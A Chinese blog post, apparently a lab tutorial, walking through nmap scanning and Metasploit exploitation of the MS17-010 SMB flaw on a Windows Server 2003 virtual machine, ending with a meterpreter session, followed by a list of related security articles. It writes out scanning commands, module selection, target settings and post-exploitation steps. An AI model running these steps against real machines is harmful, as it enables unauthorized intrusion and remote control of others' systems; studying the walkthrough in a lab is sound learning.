Kali linux利用(ms17-010)漏洞入侵Windows server 2003

原創 SuieKa 2020-06-14 16:07

NMAP MSF實現對目標系統滲透(Windows server 2003控制)

  1. Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、開發並對計算機軟件漏洞實施攻擊。
  2. 此次採用kali Linux系統集成的metasploit進行測試驗證MS17-010(永恆之藍,著名比特幣勒索漏洞)。實驗環境均採用虛擬機。

前提準備:
Kali linux: 192.168.1.113
Windows server2003:192.168.1.102

1,方式一先使用nmap探測網絡中存活主機(設備)

在這裏插入圖片描述
方式二
root@wangzhike:~# netdiscover -i eth0 -r 192.168.1.0/24
在這裏插入圖片描述
目標系統:192.168.1.102 windows server 2003

2,探測網絡中的系統類型(nmap)
root@wangzhike:~# nmap -O 192.168.1.0/24
在這裏插入圖片描述
3.端口掃描
root@wangzhike:~# nmap -p 1-1000 192.168.1.102

root@wangzhike:~# nmap -p 1-1000 192.168.1.102
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 12:46 CST
Nmap scan report for 192.168.1.102
Host is up (0.000071s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:82:C6:C2 (VMware)

端口介紹:
135端口:服務dcom、rpc的端口----客戶機連入系統服務
139端口:netbios文件打印共享服務—共享磁盤
445端口:文件夾共享、打印共享服務

4,利用server 2003自身漏洞(ms17-010)
前提:Windows server 2003 需要關閉防火牆。
入侵前必須初始、啓動數據庫。

root@wangzhike:~# msfdb init		//初始化數據庫
root@wangzhike:~# msfdb start		//啓動數據庫
root@wangzhike:~# netstat -ntlup | grep post 	//查看端口
root@wangzhike:~# msfdb status		//查看數據庫狀態

在這裏插入圖片描述
root@wangzhike:~# nmap --script=smb-vuln*.nse 192.168.1.102
在這裏插入圖片描述
我們·可以看到Windows server 2003存在ms17-010漏洞

root@wangzhike:~# msfconsole

在進入後
#####進入後不一定是這種樣式#####

msf > search ms17_010 //搜索查看漏洞

[!] Module database cache not built yet, using slow search
Matching Modules
================
   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf >

我們利用這個模塊:exploit/windows/smb/ms17_010_psexec
msf > use windows/smb/ms17_010_psexec //利用模塊
在這裏插入圖片描述

set rhosts 192.168.1.102	//設置攻擊目標的IP地址
set lhost 192.168.1.113		//攻擊機ip地址

進行攻擊run侵入:

在這裏插入圖片描述
侵入後可看到meterpreter>
我們就可以使用ifconfig命令
查看ip地址爲192.168.1.102
####地址爲192.168.1.102####
查看當前目錄pwd
在這裏插入圖片描述
在C:\WINDOWS目錄中創建wang.txt和hello.txt文件
在這裏插入圖片描述
在Windows server 2003中查看創建的兩個目錄
在這裏插入圖片描述
當然我們也可以進行其他控制!!!

至此,我們就可以使用kali linux 控制Windows server 2003啦!!!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

kali 配置中文輸入法

1.apt-get install fcitx5 fcitx5-chinese-addon fcitx5-pinyin fcitx5-pinyin-gui fcitx5-module-* 2.im-config,運行後指定fcitx5爲默認

原創 2024-05-24 01:42:44

centos linux7忘記root密碼,進行密碼重置

小編今天就忘記Linux root 用戶的口令,下面就由小編來教教大家如果忘記root口令怎麼辦 第1步:開機後在內核上按“e”。 第二步:按e以後會進入內核啓動頁面,在linux16這行的後面輸入“rd.break console=t

南人旧心1906 2020-07-08 02:03:38

工信部爲“新基建”安全加把“鎖”

雲棲號資訊:【點擊查看更多行業資訊】在這裏您可以找到不同行業的第一手的上雲資訊,還在等什麼,快來! 8月3日,工業和信息化部發布通知,要求開展2020年網絡安全技術應用試點示範工作。按照通知,2020年網絡安全技術應用試點示範選取的重點方向

雲棲號資訊小哥 2020-08-04 13:13:52

企業的數字化轉型如何面對網絡安全問題

雲棲號資訊:【點擊查看更多行業資訊】在這裏您可以找到不同行業的第一手的上雲資訊,還在等什麼,快來! 網絡安全是公司進步和數字化轉型的較大障礙之一。自然,隨着新技術的出現,新的漏洞將使公司難以駕馭,尤其是在新的雲環境中。從法律上講,網絡安全設

雲棲號資訊小哥 2020-07-30 14:16:49

網絡安全的未來是否掌握在 AI 手中(三)

雲棲號資訊:【點擊查看更多行業資訊】在這裏您可以找到不同行業的第一手的上雲資訊,還在等什麼,快來! AI 提升網絡防禦系統安全級別 可能的網絡防禦系統應該至少提供三個級別的網絡安全。 第一級別包括傳統的靜態網絡防禦機制,如身份認證、密碼保護

雲棲號資訊小哥 2020-07-14 14:55:57

免責聲明,告知

本欄內容只供學習使用,如有違反法律,與本人無關。 在下載後24小時後,請及時刪除。 對可能危及普通公衆權益與自由的漏洞或技術運用或發佈應保持謹慎。 不應違背保護信息自由流動的底線。 請尊重版權信息,購買正版。 如本博客裏有錯誤出現,請

zhangguangyi888 2020-07-08 11:39:41

等保測評--通信網絡安全測評要求

信息安全等級保護,是對信息和信息載體按照重要性等級分級別進行保護的一種工作,在中國、美國等很多國家都存在的一種信息安全領域的工作。在中國,信息安全等級保護廣義上爲涉及到該工作的標準、產品、系統、信息等均依據等級保護思想的安全工作;狹義上一

江南落花雨 2020-07-08 07:12:19

等保測評--物理環境安全測評要求

信息安全等級保護,是對信息和信息載體按照重要性等級分級別進行保護的一種工作,在中國、美國等很多國家都存在的一種信息安全領域的工作。在中國,信息安全等級保護廣義上爲涉及到該工作的標準、產品、系統、信息等均依據等級保護思想的安全工作;狹義上一

江南落花雨 2020-07-08 07:12:19

【公益譯文】網絡安全滑動標尺模型–SANS分析師白皮書

http://blog.nsfocus.net/sliding-scale-cyber-security/

云上笛暮 2020-07-08 06:09:02

2020年全球風險報告

原文:https://www.marsh.com/cn/zh/insights/research/global-risks-report-2020.html

云上笛暮 2020-07-08 06:09:01

超初級的Linux後門製作方法

一個文件都有一個所有者,表示該文件是誰創建的。同時,該文件還有一個組編號,表示該文件所屬的組,一般爲文件所有者所屬的組.   如果是一個可執行文件,那

opl001 2020-07-08 01:57:42

【趣話編程】如果張東昇是個程序員

簡介:趣話編程第五期,今天讓我們來講一講“隱祕的角落”之程序員版張東昇。原文鏈接張東昇是一家互聯網公司的程序員,一直以來都勤勤懇懇老實工作。可最近一段時間,老闆接了幾個項目回來,不但開啓了996的工作模式,更要命的是頻頻更改需求,

阿里技术官方号 2020-07-08 00:43:28

內網滲透(上)

每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透

划水的小白白 2020-07-08 00:37:05

基於PU-Learning的惡意URL檢測

基於PU-Learning的惡意URL檢測 原文作者:Ya-Lin Zhang, Longfei Li, Jun Zhou, Xiaolong Li, Yujiang Liu, Yuanchao Zhang, Zhi-Hua Zh

Ronnyz 2020-07-07 20:13:37

解決在Windows server2003虛擬機上無法安裝IIS組件的問題

解決在Windows server2003虛擬機上無法安裝IIS組件的問題   最近在研究網絡方面的知識,於是找了幾個測試網站源碼,打算自己搭一個測試平臺,練一練手。找到有網站 漏洞的源碼後,用PHPstudy作爲網站服務器平臺用的不太熟

running boy 2020-07-07 12:42:34